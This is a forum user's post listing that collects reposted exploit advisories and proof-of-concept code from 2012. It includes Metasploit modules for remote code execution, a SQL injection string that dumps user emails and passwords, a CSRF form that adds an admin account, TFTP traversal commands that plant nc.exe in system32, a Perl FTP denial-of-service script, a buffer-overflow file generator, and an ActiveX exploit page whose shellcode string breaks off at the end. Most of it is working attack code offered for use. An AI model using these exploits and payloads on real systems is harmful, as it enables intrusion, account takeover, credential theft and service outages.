Everything posted by The_Arhitect

  1. IrfanView FlashPix PlugIn Decompression Heap Overflow

#####################################################################################
Application:    IrfanView FlashPix PlugIn Decompression Heap Overflow
Platforms:      Windows
Secunia Number: SA48772
{PRL}:          2012-08
Author:         Francis Provencher (Protek Research Lab's)
Website:        http://www.protekresearchlab.com/
Twitter:        @ProtekResearch
#####################################################################################

1) Introduction
2) Timeline
3) Technical details
4) PoC

#####################################################################################

===============
1) Introduction
===============
IrfanView is a freeware/shareware image viewer for Microsoft Windows that can view, edit, and convert image files and play video/audio files. It is noted for its small size, speed, ease of use, and ability to handle a wide variety of graphic file formats, and has some image creation and painting capabilities. The software was first released in 1996. IrfanView is free for non-commercial use; commercial use requires paid registration.

#####################################################################################

============
2) Timeline
============
2012-04-06 - Vulnerability reported to secunia
2012-04-13 - Coordinated public release of advisory

#####################################################################################

====================
3) Technical details
====================
The vulnerability is caused by insufficient validation when decompressing FlashPix images and can be exploited to cause a heap-based buffer overflow via a specially crafted FPX file.

#####################################################################################

=============
4) The PoC
=============
http://www.exploit-db.com/sploits/18739.fpx

###############################################################################

Source: IrfanView FlashPix PlugIn Decompression Heap Overflow
  2. V-CMS PHP File Upload and Execute

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info={})
		super(update_info(info,
			'Name'           => "V-CMS PHP File Upload and Execute",
			'Description'    => %q{
					This module exploits a vulnerability found on V-CMS's inline image upload feature.
				The problem is due to the inline_image_upload.php file not checking the file type
				before saving it on the web server.  This allows any malicious user to upload a script
				(such as PHP) without authentication, and then execute it with a GET request.  The issue
				is fixed in 1.1 by checking the extension name.  By default, 1.1 only allows jpg, jpeg,
				png, gif, bmp, but it is still possible to upload a PHP file as one of those extension
				names, which may still be leveraged in an attack.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'AutoSec Tools',  #Initial discovery
					'sinn3r'          #Metasploit
				],
			'References'     =>
				[
					['CVE', '2011-4828'],
					['BID', '50706'],
					['URL', 'http://bugs.v-cms.org/view.php?id=53'],
					['URL', 'http://xforce.iss.net/xforce/xfdb/71358']
				],
			'Payload'        =>
				{
					'BadChars' => "\x00",
				},
			'DefaultOptions' =>
				{
					'ExitFunction' => "none"
				},
			'Platform'       => 'php',
			'Arch'           => ARCH_PHP,
			'Targets'        =>
				[
					['V-CMS 1.0', {}],
				],
			'Privileged'     => false,
			'DisclosureDate' => "Nov 27 2011",  #When the ticket was created
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('TARGETURI', [true, 'The URI path to V-CMS', '/vcms/'])
			], self.class)
	end

	def check
		res = send_request_raw({
			'uri'    => target_uri.path,
			'method' => 'GET'
		})

		if res and res.body =~ /V\-CMS v1\.[0-1]/
			return Exploit::CheckCode::Appears
		else
			return Exploit::CheckCode::Safe
		end
	end

	# Remove the uploaded script once a session has been established
	def on_new_session(client)
		if client.type == "meterpreter"
			client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
			client.fs.file.rm(@payload_name)
		else
			client.shell_command_token("rm #{@payload_name}")
		end
	end

	def exploit
		peer = "#{rhost}:#{rport}"

		base = target_uri.path
		base << '/' if base[-1,1] != '/'

		@payload_name = "#{rand_text_alpha(5)}.php"

		p = %Q|<?php
		#{payload.encoded}
		?>
		|
		p = p.gsub(/^\t\t/, '')

		post_data  = "------x\r\n"
		post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"\r\n"
		post_data << "Content-Type: image/gif\r\n"
		post_data << "\r\n"
		post_data << p
		post_data << "------x--\r\n"

		print_status("#{peer} Uploading payload: #{@payload_name}")
		res = send_request_cgi({
			'uri'    => "#{base}includes/inline_image_upload.php",
			'method' => 'POST',
			'ctype'  => 'multipart/form-data; boundary=----x',
			'data'   => post_data
		})

		if res
			print_status("#{peer} replies status: #{res.code.to_s}")
		else
			print_error("#{peer} No response from server. Will not continue")
			return
		end

		print_status("#{peer} Executing payload: #{@payload_name}")
		res = send_request_raw({
			'uri'    => "#{base}temp/#{@payload_name}",
			'method' => 'GET'
		})

		if res and res.code == 404
			print_error("#{peer} 404 - the upload probably failed")
			return
		end

		handler
	end
end

Source: V-CMS PHP File Upload and Execute
  3. EMC IRM License Server DoS Server 4.6.1.1995

#######################################################################

                             Luigi Auriemma

Application:  EMC IRM License Server
              http://www.emc.com
Versions:     <= 4.6.1.1995
Platforms:    Windows
Bugs:         A] "version compat check" *FIPS NULL pointer
              B] freezing caused by multiple commands
              C] NULL pointer caused by commands after invalid version
Exploitation: remote
Date:         10 Apr 2012
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bugs
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

From the manual:
"The IRM Server is a secure server containing a database that stores the encryption keys needed by authorized users to access protected content. The database also stores policies that specify who can access the information and what they can do with it."

#######################################################################

=======
2) Bugs
=======

--------------------------------------------
A] "version compat check" *FIPS NULL pointer
--------------------------------------------

The missing *FIPS fields in the "version compat check" command leads to a NULL pointer in execution:

  004AB67B  . 8D45 E4          LEA EAX,DWORD PTR SS:[EBP-1C]
  004AB67E  . 50               PUSH EAX
  004AB67F  . 53               PUSH EBX
  004AB680  . 8D85 5C020000    LEA EAX,DWORD PTR SS:[EBP+25C]
  004AB686  . 50               PUSH EAX
  004AB687  . FF75 C4          PUSH DWORD PTR SS:[EBP-3C]
  004AB68A  . FF55 E8          CALL DWORD PTR SS:[EBP-18]   ; NULL pointer

---------------------------------------
B] freezing caused by multiple commands
---------------------------------------

Process freezing caused by some continuous malformed commands, for example "batch begin untethered" with an Id composed by line-feeds.

Note about the proof-of-concept: manually kill the PoC when everything seems inactive and you no longer receive data from the server so that it will start to consume resources.

--------------------------------------------------------
C] NULL pointer caused by commands after invalid version
--------------------------------------------------------

Looks like it's possible to cause some NULL pointer dereferences if the initial "version compat check" contains an invalid Version and other commands are then sent.

The effect of all the vulnerabilities is the impossibility of using the IRM server, the pvcontrol.exe process remains active but it's no longer usable.

#######################################################################

===========
3) The Code
===========

http://aluigi.org/poc/irm_1.zip

#######################################################################

======
4) Fix
======

No fix.

#######################################################################

Source: EMC IRM License Server DoS Server 4.6.1.1995
  4. Software DEP Classified Script 2.5 SQL Injection Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Software DEP Classified Script 2.5 SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Author:   h0rd
Contact:  h0rd[at]null.net
homepage: http://h0rd.net
download: http://www.softwaredep.com/classified-script.html
Price:    $199

PoC exploit:
http://[host]/ad_detail.php?id=null union select 1,2,3,4,concat(email,0x3a,0x3a,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19 from user--

login page:
http://[host]/[script]/admin/

Source: Software DEP Classified Script 2.5 SQL Injection Vulnerability
  5. BulletProof FTP Client 2010 - Buffer Overflow Vulnerability

Title:
======
BulletProof FTP Client 2010 - Buffer Overflow Vulnerability

Date:
=====
2012-04-02

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=475

VL-ID:
=====
475

Introduction:
=============
BPFTP Client is a fully automated FTP client, with many advanced features including automatic download resuming, leech mode, ftp search and much more. Perfect for personal or corporate Webmasters as well as for Software and Music traders.

Features:
+ Automatic Resume/Reconnect
+ Browse Offline with Cache
+ Leech Mode
+ Hidden File Support
+ Download Credit/Ratio Support
+ Clipboard Monitor
+ Queue 1,000s of Actions
+ Proxy/Firewall Support
+ HTTP/Webserver Support
+ Import CuteFTP, WS_FTP, FTP Explorer
+ Remote Mirroring
+ Search and Filter Ability

(Copy of the Vendor Homepage: http://www.bpftp.com )

Abstract:
=========
A Vulnerability Laboratory Researcher discovered a Local Buffer Overflow vulnerability on BulletProof FTP Client v2010.75.0.76

Report-Timeline:
================
2012-03-14: Vendor Notification
2012-03-16: Vendor Response/Feedback
2012-04-02: Public or Non-Public Disclosure

Status:
========
Published

Affected Products:
==================
BulletProof
Product: BPFTP Client Software (Windows) v2010.75.0.76 & 2011.x

Exploitation-Technique:
=======================
Local

Severity:
=========
High

Details:
========
A Buffer Overflow vulnerability is detected on BulletProof FTP Client v2010.75.0.76 (current version). The vulnerability is located in the main executable bpftpclient.exe. During the start of the application the value LogFileName from the registry key [HKEY_CURRENT_USER/Software/BulletProof Software/BulletProof FTP Client 2010/Options] is read. When inserting an oversized value to the registry value a buffer overflow is triggered. The victim only needs to start the application.

Vulnerable Module(s):
[+] bpftpclient.exe

--- Debugger Logs ---
# 42424242: The instruction at 0x42424242 referenced memory at 0x42424242. The memory could not be read -> 42424242 (exc.code c0000005, tid 2264)
# Registers:
#   EAX 00000000
#   ECX 42424242
#   EDX 7C9132BC ntdll.7C9132BC
#   EBX 00000000
#   ESP 0012F594
#   EBP 0012F5B4
#   ESI 00000000
#   EDI 00000000
#   EIP 42424242
# Stack:
#   0012F588 00140198
#   0012F58C 7C91D80A ntdll.7C91D80A
#   0012F590 7C9601E1 ntdll.7C9601E1
#   0012F594 7C9132A8 RETURN to ntdll.7C9132A8
#   0012F598 0012F67C
#   0012F59C 0012FBCC ASCII ``AAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC``
#   0012F5A0 0012F698
# Dump:
#   0012FBB4 41 41 41 41 41 41 41 41 AAAAAAAA
#   0012FBBC 41 41 41 41 41 41 41 41 AAAAAAAA
#   0012FBC4 41 41 41 41 41 41 41 41 AAAAAAAA
#   0012FBCC 41 41 41 41 42 42 42 42 AAAABBBB
#   0012FBD4 43 43 43 43 43 43 43 43 CCCCCCCC
#   0012FBDC 43 43 43 43 43 43 43 43 CCCCCCCC
#   0012FBE4 43 43 43 43 43 43 43 43 CCCCCCCC

Picture(s):
../1.png
../2.png

Proof of Concept:
=================
The vulnerability can be exploited by local attackers. Successful exploitation requires no user interaction. For demonstration or reproduce ...

#!/usr/bin/python
# Exploit Title: BulletProof FTP Client v2010.75.0.76 Local Buffer Overflow
# Version: 2010.75.0.76
# Date: 2012-03-11
# Author: Julien Ahrens
# Homepage: http://www.inshell.net
# Software Link: http://www.bpftp.com/
# Tested on: Windows XP SP3 Professional German
# Notes: -
# Howto: Import Reg -> Start App

file = "poc.reg"

# 448 bytes of filler, then 4 bytes that land in EIP (0x42424242), then trailing filler
junk1 = "\x41" * 448
boom = "\x42\x42\x42\x42"
junk2 = "\x43" * 100

# Build a .reg file that writes the oversized LogFileName value
poc = "Windows Registry Editor Version 5.00\n\n"
poc = poc + r"[HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client 2010\Options]" + "\n"
poc = poc + "\"LogFileName\"=\"" + junk1 + boom + junk2 + "\""

try:
    print("[*] Creating exploit file...\n")
    writeFile = open(file, "w")
    writeFile.write(poc)
    writeFile.close()
    print("[*] File successfully created!")
except IOError:
    print("[!] Error while creating file!")

Risk:
=====
The security risk of the local buffer overflow vulnerability is estimated as high(+).

Credits:
========
Vulnerability Research Laboratory - Julien Ahrens (MrTuxracer) [www.inshell.net]

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers.

Copyright © 2012|Vulnerability-Lab

--
VULNERABILITY RESEARCH LABORATORY TEAM
Website: www.vulnerability-lab.com
Mail: research@vulnerability-lab.com

Source: BulletProof FTP Client 2010 - Buffer Overflow Vulnerability
  6. Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability

# Exploit Title: Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability
# Date: 7/4/2012
# Author: Dr.NaNo
# Software Link: http://www.utopiasoftware.net/newspro/dl.php?filename=newspro140b.zip&mirror=1
# Version: 1.4.0
# Tested on: Linux-Red-Hat
# Google Dork: Powered By Utopia News Pro 1.4.0
#
########################################################
# ~ Exploit ~
########################################################

<html>
<body>
<form action="http://localhost/{PATh}/upload/users.php" method="post">
<input type="hidden" name="username" value="NANO" />
<input type="hidden" name="groupid" value="1" />
<input type="hidden" name="password" value="102030" />
<input type="hidden" name="password2" value="102030" />
<input type="hidden" name="email" value="security@security.com" />
<input type="submit" name="submitnew" accesskey="s" value="ThankS !" />
</form>
</body>
</html>

#### ~ Greetz ~ #########################################################
#                                                                       #
# Dr.WEP , JIKO , ahwak2000 , RENO , ABU NWAF , Dr.HAiL , snc0pe , 020  #
#                                                                       #
# JaBrOt HaCkEr , alkaseer20 , SadHaCkEr , Cyber Code , aircrack -ng    #
#                                                                       #
############################################### ~ All FriendS ~ #########

Source: Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability
  7. Distinct TFTP Server <= 3.01 Directory Traversal Vulnerability

# Exploit Title: Distinct TFTP Server <= 3.01 Directory Traversal Vulnerability
# Date: April 8, 2012
# Software Link: http://www.distinct.com/index.php/downloads/index/p=ISERV
# Affected Versions: 3.01; previous versions may also be affected
# Tested on: Windows XP SP3, Windows Server 2003, Windows 7 SP1

Software Description
--------------------
Distinct Intranet Servers, which includes FTP Server, TFTP, LPD, BOOTP and NFS, bring quality server power to your network with no additional hardware investment. These servers allow you to make use of your PCs to share important services among your users.

Vulnerability Details
---------------------
The vulnerability is caused by improper validation of GET and PUT requests containing dot dot slash ('../') sequences, which allows attackers to read or write arbitrary files.

Attack Vector
-------------
By requesting a dot dot slash within the GET or PUT request, it is possible to retrieve operating system files such as boot.ini or upload a file (errh, nc.exe?) to Windows %systemroot% (C:\WINDOWS\system32\).

Impact
------
Read and write files from remote machine.

Proof of Concept
----------------
We assume that the directory is deep enough, so you have to set a deep path on the server configuration.

If a GET request followed with '../../' (dot dot slash), trying to retrieve boot.ini file, is sent to Distinct TFTP Server 3.01, the file will be retrieved successfully.

hell:~ modpr0be$ tftp -e 10.211.55.5 69
tftp> get ../../../../../../../../../../../../../boot.ini
Received 211 bytes in 0.0 seconds
tftp>

Next, if we try to upload a file, let say Netcat (nc.exe), to Windows %systemroot% directory (C:\WINDOWS\system32\) using a PUT command, here is the result:

hell:~ modpr0be$ tftp -e 10.211.55.5 69
tftp> put /Pentest/backdoor/nc.exe ../../../../../../../../../../../../../../../Windows/system32/nc.exe
Sent 59392 bytes in 0.3 seconds
tftp>

Netcat successfully uploaded.

Another combinations:

tftp> get ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
tftp> put /Pentest/backdoor/nc.exe ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\system32\nc.exe

Solution Status
---------------
Unavailable

Risk Factor
-----------
CVSS Base Score     = 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N)
Exploitability Subscore = 10
Impact Subscore     = 4.9
CVSS Temporal Score = 5.2
Overall CVSS Score  = 5.8
Risk factor         = Medium

Credits
-------
Tom Gregory from Spentera Research

References
----------
http://www.spentera.com/advisories/2012/SPN-01-2012.pdf

Disclosure Timeline
-------------------
March 28, 2012, issue discovered
March 28, 2012, vendor contacted about the issue, no response
April 9, 2012, public advisory released

Source: Distinct TFTP Server <= 3.01 Directory Traversal Vulnerability
  8. LANDesk Lenovo ThinkManagement Console Remote Command Execution

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::EXE

	def initialize
		super(
			'Name'           => 'LANDesk Lenovo ThinkManagement Console Remote Command Execution',
			'Description'    => %q{
					This module can be used to execute a payload on LANDesk Lenovo ThinkManagement
				Suite 9.0.2 and 9.0.3. The payload is uploaded as an ASP script by sending a
				specially crafted SOAP request to "/landesk/managementsuite/core/core.*********/ServerSetup.asmx",
				via a "RunAMTCommand" operation with the command '-PutUpdateFileCore' as the argument.
				After execution, the ASP script with the payload is deleted by sending another
				specially crafted SOAP request to "WSVulnerabilityCore/VulCore.asmx" via a
				"SetTaskLogByFile" operation.
			},
			'Author'         =>
				[
					'Andrea Micalizzi', # aka rgod - Vulnerability Discovery and PoC
					'juan vazquez'      # Metasploit module
				],
			'Version'        => '$Revision: $',
			'Platform'       => 'win',
			'References'     =>
				[
					['CVE', '2012-1195'],
					['CVE', '2012-1196'],
					['OSVDB', '79276'],
					['OSVDB', '79277'],
					['BID', '52023'],
					['URL', 'http://www.exploit-db.com/exploits/18622/'],
					['URL', 'http://www.exploit-db.com/exploits/18623/']
				],
			'Targets'        =>
				[
					[ 'LANDesk Lenovo ThinkManagement Suite 9.0.2 / 9.0.3 / Microsoft Windows Server 2003 SP2', { } ],
				],
			'DefaultTarget'  => 0,
			'Privileged'     => false,
			'DisclosureDate' => 'Feb 15 2012'
		)

		register_options(
			[
				OptString.new('PATH', [ true, "The URI path of the LANDesk Lenovo ThinkManagement Console", '/'])
			], self.class)
	end

	def exploit
		peer = "#{rhost}:#{rport}"

		# Generate the ASP containing the EXE containing the payload
		exe = generate_payload_exe
		asp = Msf::Util::EXE.to_exe_asp(exe)

		# htmlentities like encoding (the ASP body travels inside an XML element)
		asp = asp.gsub("&", "&amp;").gsub("\"", "&quot;").gsub("'", "&apos;").gsub("<", "&lt;").gsub(">", "&gt;")

		uri_path = (datastore['PATH'][-1,1] == "/" ? datastore['PATH'] : datastore['PATH'] + "/")

		upload_random = rand_text_alpha(rand(6) + 6)
		upload_xml_path = "ldlogon\\#{upload_random}.asp"

		soap = <<-eos
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <RunAMTCommand xmlns="http://tempuri.org/">
      <Command>-PutUpdateFileCore</Command>
      <Data1>#{rand_text_alpha(rand(4) + 4)}</Data1>
      <Data2>#{upload_xml_path}</Data2>
      <Data3>#{asp}</Data3>
      <ReturnString>#{rand_text_alpha(rand(4) + 4)}</ReturnString>
    </RunAMTCommand>
  </soap:Body>
</soap:Envelope>
		eos

		#
		# UPLOAD
		#
		attack_url = uri_path + "landesk/managementsuite/core/core.*********/ServerSetup.asmx"
		print_status("#{peer} - Uploading #{asp.length} bytes through #{attack_url}...")
		res = send_request_cgi({
			'uri'     => attack_url,
			'method'  => 'POST',
			'ctype'   => 'text/xml; charset=utf-8',
			'headers' => {
				'SOAPAction' => "\"http://tempuri.org/RunAMTCommand\"",
			},
			'data'    => soap,
		}, 20)

		if (! res)
			print_status("#{peer} - Timeout: Trying to execute the payload anyway")
		elsif (res.code < 200 or res.code >= 300)
			print_error("#{peer} - Upload failed on #{attack_url} [#{res.code} #{res.message}]")
			return
		end

		#
		# EXECUTE
		#
		upload_path = uri_path + "ldlogon/#{upload_random}.asp"
		print_status("#{peer} - Executing #{upload_path}...")
		res = send_request_cgi({
			'uri'    => upload_path,
			'method' => 'GET'
		}, 20)

		if (! res)
			print_error("#{peer} - Execution failed on #{upload_path} [No Response]")
			return
		end

		if (res.code < 200 or res.code >= 300)
			print_error("#{peer} - Execution failed on #{upload_path} [#{res.code} #{res.message}]")
			return
		end

		#
		# DELETE
		#
		soap = <<-eos
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <SetTaskLogByFile xmlns="http://tempuri.org/">
      <computerIdn>1</computerIdn>
      <taskid>1</taskid>
      <filename>../#{upload_random}.asp</filename>
    </SetTaskLogByFile>
  </soap:Body>
</soap:Envelope>
		eos

		attack_url = uri_path + "WSVulnerabilityCore/VulCore.asmx"
		print_status("#{peer} - Deleting #{upload_path} through #{attack_url}...")
		res = send_request_cgi({
			'uri'     => attack_url,
			'method'  => 'POST',
			'ctype'   => 'text/xml; charset=utf-8',
			'headers' => {
				'SOAPAction' => "\"http://tempuri.org/SetTaskLogByFile\"",
			},
			'data'    => soap,
		}, 20)

		if (! res)
			print_error("#{peer} - Deletion failed at #{attack_url} [No Response]")
			return
		elsif (res.code < 200 or res.code >= 300)
			print_error("#{peer} - Deletion failed at #{attack_url} [#{res.code} #{res.message}]")
			return
		end

		handler
	end
end

Source: LANDesk Lenovo ThinkManagement Console Remote Command Execution
  9. NetOp Remote Control Client 9.5 Buffer Overflow

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::FILEFORMAT

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'NetOp Remote Control Client 9.5 Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack-based buffer overflow in NetOp Remote Control 9.5.
				Opening a .dws file containing a specially crafted string longer than 520
				characters will allow an attacker to execute arbitrary code.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Ruben Alejandro "chap0"',
				],
			'References'     =>
				[
					[ 'OSVDB', '72291' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/17223/' ]
				],
			'DefaultOptions' =>
				{
					'ExitFunction' => 'process',
					'DisablePayloadHandler' => 'true'
				},
			'Platform'       => 'win',
			'Payload'        =>
				{
					'Space'           => 2000,
					'BadChars'        => "\x00\x0a\x0d",
					'DisableNops'     => true,
					'StackAdjustment' => -3500
				},
			'Targets'        =>
				[
					[ 'Windows XP SP3',
						{
							'Ret'    => 0x20d6c32c, # push esp # ret - nrp.DLL
							'Offset' => 524
						}
					]
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Apr 28 2011',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('FILENAME', [ true, 'The file name.', 'msf.dws']),
			], self.class)
	end

	def exploit
		buffer = rand_text(target['Offset'])
		buffer << [target.ret].pack('V')
		buffer << make_nops(30)
		buffer << payload.encoded

		file_create(buffer)
	end
end

Source: NetOp Remote Control Client 9.5 Buffer Overflow
  10. KnFTPd 1.0.0 'FEAT' DoS PoC-Exploit

#!/usr/bin/perl
#################################################################################
# Advisory:          KnFTPd 1.0.0 'FEAT' DoS PoC-Exploit
# Author:            Stefan Schurtz
# Affected Software: Successfully tested on KnFTPd 1.0.0
# Vendor URL:        http://knftp.sourceforge.net/
# Vendor Status:     informed
# CVE-ID:            -
# PoC-Version:       1.0
#################################################################################

use strict;
use Net::FTP;

my $user = "system";
my $password = "secret";

########################
# connect
########################

my $target = $ARGV[0];
my $plength = $ARGV[1];

print "\n";
print "\t#######################################################\n";
print "\t# This PoC-Exploit is only for educational purpose!!! #\n";
print "\t#######################################################\n";
print "\n";

if (!$ARGV[0]||!$ARGV[1]) {
	print "[+] Usage: $0 <target> <payload length>\n";
	exit 1;
}

my $ftp=Net::FTP->new($target,Timeout=>12) or die "Cannot connect to $target: $@";
print "[+] Connected to $target\n";

########################
# login
########################

$ftp->login($user,$password) or die "Cannot login ", $ftp->message;
print "[+] Logged in with user $user\n";

###################################################
# Building payload './A' with min. length of 94
##################################################

my @p = ( "","./A" );
my $payload;

print "[+] Building payload\n";

# each iteration appends the current element and pushes it again,
# so the list (and the payload) grows with $plength
for (my $i=1;$i<=$plength;$i++) {
	$payload .= $p[$i];
	push(@p,$p[$i]);
}

sleep(3);

#########################################
# Sending payload
#########################################

print "[+] Sending payload [$payload]\n";
$ftp->quot('FEAT ' ."$payload");

##########################################
# disconnect
##########################################

print "[+] Done\n";
$ftp->quit;
exit 0;

#EOF

Source: KnFTPd 1.0.0 'FEAT' DoS PoC-Exploit
  11. PicoPublisher v2.0 Remote SQL Injection

# Exploit Title : PicoPublisher v2.0 Remote SQL injection
# Date          : 29/03/2012
# Author        : ZeTH
# Contact       : zeth/at/hacktheplan8/dot/com http://www.hacktheplan8.com
# Vendor        : Pico Software
# Site          : http://pico.no/
# Version       : 2.0
# Price         : $29,00
# Dork          : intext:"Drives med PicoPublisher"

:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

--[1]-- Introduction

PicoPublisher business software
PicoPublisher is a product from Pico Software

[Manage your website]
PicoPublisher makes it easy to manage your website. With the built in templates you can add columns, slideshows, tabs, boxes and videos directly from the text editor.

[Manage your customers]
CRM systems are often too expensive for small businesses. With PicoPublisher you can manage your customers just as easy as your website. And at the same place!

[Create invoices]
Create professional PDF invoices in seconds. Add products to the database and insert products to the invoice directly. You will get notifications when invoices are overdue.

--[2]-- Vulnerability

Files :
[+] page.php
[+] single.php

Attack Method : Remote SQL injection

POC :
[+] http://site/page.php?id=SQLi
[+] http://site/single.php?id=SQLi

Tables :
+-------------------+
| customers
| expenses
| gallery_category
| gallery_photos
| invoice_reminders
| invoices
| invoices_product
| menu_items
| menus
| notes
| options
| orders
| orders_product
| pages
| pico_comments
| pico_config
| pico_karma_voted
| posts
| product_list
| users
+-------------------+

--[3]-- Greetz

hacktheplan8 [hellcome to new friends kasp3r, Pitung]
MainHack Brotherhood, Kecoak Elektronik, Echo
packetstormsecurity, exploit-db, 1337day
Paman, Vrs-hCk, OoN_BoY, em|nem, [S]hiro, Martin, xshadow, ElDiablo, Furkan, pizzyroot, H312Y

Source: PicoPublisher v2.0 Remote SQL Injection
  12. Quest InTrust 10.4.x Annotation Objects ActiveX Control AnnotateX.dll Uninitialized Pointer Remote Code Execution

Quest InTrust 10.4.x Annotation Objects ActiveX Control AnnotateX.dll Uninitialized Pointer Remote Code Execution

homepage: http://www.quest.com/intrust/

description:
"InTrust securely collects, stores, reports and alerts on event log data from Windows, Unix and Linux systems, helping you comply with external regulations, internal policies and security best practices."

download url of a test version: http://www.quest.com/downloads/
file tested: Quest_InTrust---Full-Package_104.zip

Background:

The mentioned product installs an ActiveX control with the following settings:

binary path: C:\PROGRA~1\COMMON~1\SOFTWA~1\ANNOTA~1.DLL
CLSID: {EF600D71-358F-11D1-8FD4-00AA00BD091C}
ProgID: AnnotationX.AnnList.1
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): True
Safe for Initialization (IObjectSafety): True

According to the IObjectSafety interface it is safe for scripting and safe for initialization, so Internet Explorer will allow scripting of this control from remote.

Vulnerability:

By invoking the Add() method it is possible to call inside a memory region of choice set by the attacker through ex. heap spray or other techniques.

Example code:

<object classid='clsid:EF600D71-358F-11D1-8FD4-00AA00BD091C' id='obj' />
</object>
<script>
obj.Add(0x76767676,1);
</script>

...
eax=76767676 ebx=4401e51c ecx=01f85340 edx=00000000 esi=01f85340 edi=00000001
eip=4400ae62 esp=015fd134 ebp=015fd140 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
ANNOTA_1+0xae62:
4400ae62 ff1485504a0244  call    dword ptr ANNOTA_1!DllUnregisterServer+0x19235 (44024a50)[eax*4] ds:0023:1ddc2428=????????
...

You are in control of eax: fully exploitable.

As attachment, proof of concept code.

<!--
Quest InTrust 10.4.x Annotation Objects ActiveX Control (ANNOTATEX.DLL) Uninitialized Pointer Remote Code Execution PoC (ie7)

binary path: C:\PROGRA~1\COMMON~1\SOFTWA~1\ANNOTA~1.DLL
CLSID: {EF600D71-358F-11D1-8FD4-00AA00BD091C}
ProgID: AnnotationX.AnnList.1
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): True
Safe for Initialization (IObjectSafety): True
-->
<!-- saved from url=(0014)about:internet -->
<html>
<object classid='clsid:EF600D71-358F-11D1-8FD4-00AA00BD091C' id='obj' />
</object>
<script language='javascript'>
//add user one, user "sun" pass "tzu"
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +
"%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
"%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
"%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
"%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
"%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
"%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
"%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
"%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
"%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
"%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
"%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
"%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
"%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
